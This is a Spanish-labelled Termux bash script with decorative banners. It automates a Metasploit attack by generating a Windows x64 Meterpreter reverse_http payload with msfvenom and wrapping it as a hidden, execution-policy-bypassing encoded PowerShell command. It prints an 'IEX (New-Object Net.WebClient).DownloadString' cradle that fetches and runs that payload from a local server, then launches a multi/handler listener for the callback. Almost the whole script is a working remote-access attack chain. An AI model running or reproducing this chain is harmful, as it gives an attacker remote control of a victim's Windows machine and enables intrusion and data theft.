#!/data/data/com.termux/files/usr/bin/bash

#ipp="$(curl ifconfig.co)"  > /dev/null 2>&1

############  Colores  #################
rojff='\033[1;31m'
rojx='\e[101m'
rojs='\e[41m'
roj='\033[31m'
ro2='\033[91m'
rojsub='\e[1;4;91m'

ver='\033[32m'
#ver0='\033[1;32m'
ve2='\033[92m'
#ve20='\033[1;32m'

ama='\033[33m'
amas='\033[1;4;33m'
am0='\033[1;33m'

azu='\033[34m'
az0='\033[1;34m'
neg='\e[1m'
pur='\033[35m'

cy='\033[36m'
#cy0='\033[1;36m'
##---------------
sub='\e[4m'
#fos='\e[5m'
gri='\e[2m'
#----------------
fin='\033[01;37m'
#----------------
#c0lorx="$(sh /xg/0r/.betas/i/colorxx2)"

#h0ra2="$(sh /xg/0r/.betas/i/color2)"
########     Fin Colores ##############----

#c00l="$(sh /xg/0r/.betas/i/color)"
#bannc0l="$(sh /xg/0r/.betas/i/colorbanner)"
########     Fin Colores ##############----

#------------------------------------------------------------
#########   Fechas/hora   ############
diasem="$(date +%A)"
mes="$(date +%B)"
diafech="$(date +%e)"
ttime="$(date +'%I:%M')"
tt2="$(date +%e)"
tt3="$(date +%M)"
#timwe="$(date +'%I::%M')"
ye="$(date +%Y)"
######################################
#-------------------------------------------

########################### ip/red ####################

ip="$(ip route show|grep ' src ' |cut -d' ' -f9)"
#ant3=`netstat -r | grep "default" | awk {'print $8'}`
#nomred="$(nmcli c|sed -n '2p'|cut -d' ' -f1)"
#ipx=$(hostname -I)
#routt="$(ip route show|grep ' dhcp '|cut -d' ' -f3)"
#####################################
	rm -f /data/data/com.termux/files/home/storage/downloads/xx0 > /dev/null 2>&1
#cd /data/data/com.termux/files/home/99/0/x1

	echo ""
clear
echo "
$ama 
 ╭━━━╮╱╱╱╱╭╮╱╱╭━╮╭━╮      
$ama ┃╭━╮┃╱╱╱╱┃┃╱╱╰╮╰╯╭╯  ░░$roj ▒█▄░▒█ █▀▀ █▀▀ █▀▀█ █▀▀█  $fin
$ama ┃┃╱╰╋━━┳━╯┣━━╮╰╮╭╯   ▀▀$roj ▒█▒█▒█ █▀▀ █░░ █▄▄▀ █▄▀█  $fin
$ama ┃┃╱╭┫╭╮┃╭╮┃┃━┫╭╯╰╮   ░░$roj ▒█░░▀█ ▀▀▀ ▀▀▀ ▀░▀▀ █▄▄█  $fin 
$ama ┃╰━╯┃╰╯┃╰╯┃┃━╋╯╭╮╰╮  
 ╰━━━┻━━┻━━┻━━┻━╯    ╰━╯  $fin
$ama
            P A Y L O A D ░$cy ＳｈｅｌｌＣｏｄｅ $fin

     IEX (New-Object Net.WebClient).DownloadString
   
('http://localhost:2021/xx0')


              
              Creando Payload..."

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=$ip LPORT=1985 HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw
 touch /data/data/com.termux/files/home/storage/downloads/xx0
  shellx=`cat /data/data/com.termux/files/home/99/0/x1/mtx.raw | awk {'print $12'}`
  echo "powershell.exe -nop -wind hidden -Exec Bypass -noni -enc $shellx" >> /data/data/com.termux/files/home/storage/downloads/xx0
  cd /data/data/com.termux/files/home/99/0/x1
  rm -f *.raw

#########################
bata="/data/data/com.termux/files/home/storage/downloads/xx0"
#clear 
  


                                            if [ -e $bata ]; then



                          echo " $ama       

  

             :::ＳｈｅｌｌＣｏｄｅ::::Ｃｒｅａｄｏ!!!
                          
                          "
                                            else
      echo  "       [☠] archivo.bat     -> Not Encontrado!"
                                            exit
                                            fi
echo "

 IEX (New-Object Net.WebClient).DownloadString

 ('http://localhost:2021/xx0')

"
echo " $ama


░C░o░n░t░i░n░u░a░r░ ░c░o░n░:░$fin MΣƬΛƧPᄂӨIƬ ??
 
"

read pccc
clear
echo "

                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #$roj
                 ##        ###$fin        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##$ama
                            https://metasploit.com  $fin

"
msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_http;set LPORT 1985;set LHOST $ip;exploit"
